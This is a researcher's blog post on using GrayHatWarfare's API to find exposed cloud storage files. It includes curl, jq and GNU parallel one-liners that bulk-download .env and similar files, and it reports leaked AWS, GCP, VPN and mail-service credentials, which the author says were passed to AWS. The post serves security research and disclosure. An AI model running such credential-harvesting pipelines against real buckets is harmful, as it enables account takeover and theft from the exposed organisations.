The last post allready showed some ideas to gather sensitive files from public cloud ressources.

And yeah, it got worse…

To identify most of the stuff, we are almost exclusevly using

I had the feeling that one FacePalm is not enough


Recently on my Twitter (yes it is Twitter, not X!) timeline, there was a tweet with github dorks.
So far nothing really special, but this brought up the idea to make also some cloudstorage dorks and some quick checks showed that it is devastating.

Now you might say, not again, thats boring, thats okay and up to you, it is what it is.

Github Dorks from @therceman

Due a quick tip of @rootcathacking for a simpe OCR, we can use PowerToys Text Extractor to avoid typing all those values.

Another interesting read is as it offers a nice table what ransomwaregroups are looking for.

Table with sensitive files

Build some dorks

To design some queries, we can either use GUI queries or directly jump to the API.

URLs for the api only have a /api/v2 and a authentication header in it, so I will just keep to the api version.

curl --request GET --url \
''  --header 'Authorization: Bearer #####' | jq | grep "url" | cut -d ":" -f 2- | sed 's/,//g' | xargs -i wget --no-check-certificate {} 

As some companies / tools / people tend to use existing file extensions for other stuff it might be a good idea to quickly check it, e.g. via filesize and exclude those buckets. Nobody want several gigabytes of textures, because somebody named then x.env.

Another little trick is to add some stop words. Typically you can immediately skip files which contains words pointing to the default files, like example, sample, samples. Stopwords are provided with ` -word` for the keyword.

If you have an enterprise license for GrayHatWarfare you can also go for the regex, which should even improve it.


We need to determine the amount of results, as we can max get 1000 entries per query.

curl --request GET --url ''  --header 'Authorization: Bearer #####' | jq '.meta.results'


So we would need to make this in 24 requests if we want all data. We can either store the urls inbetween or do this directly. I would recommend to store it.

seq 0 24 | xargs -i curl --request GET --url '{}000&limit=1000'  --header 'Authorization: Bearer #####' | jq -r '.files[].url' >> env_urls.txt

cat env_urls.txt | wc -l

So we now have a huge list which we can download. To speed things a little bit up wen gonna use GNU parallel.

cat env_urls.txt |  parallel --bar -P 10 wget --no-check-certificate {} 

Dirty All in One

seq 0 24 | xargs -i curl --request GET --url '{}000&limit=1000'  --header 'Authorization: Bearer #####' | jq -r '.files[].url' | parallel --bar -P 10 wget --no-check-certificate {}

The big run

I did the following queries and downloaded the files.,,,png,webp,jpeg,html,mp3,mp4,js,css,svg&extensionsMode=exclude&,,

By doing some grepping and also using trufflehough I found:

  • 185 AWS keys (AKIA#######) from them at least 45 Keys have been valid. From the valdi tokens several user had access to the IAM, at least one was directly a full administrator. I reported them to AWS.
  • 3 GCP service accounts
  • Several working OpenVPN Configurations lacking a password
  • Multiple valid API Keys for mailchimp, mailgun and sendgrid


I tried to talk to the AWS support about the leaked keys, which was quite difficult, as they did not understand, that I am not careing about my own account here. So I sent 45 sets of AWS credentials to them, let’s see what will happen.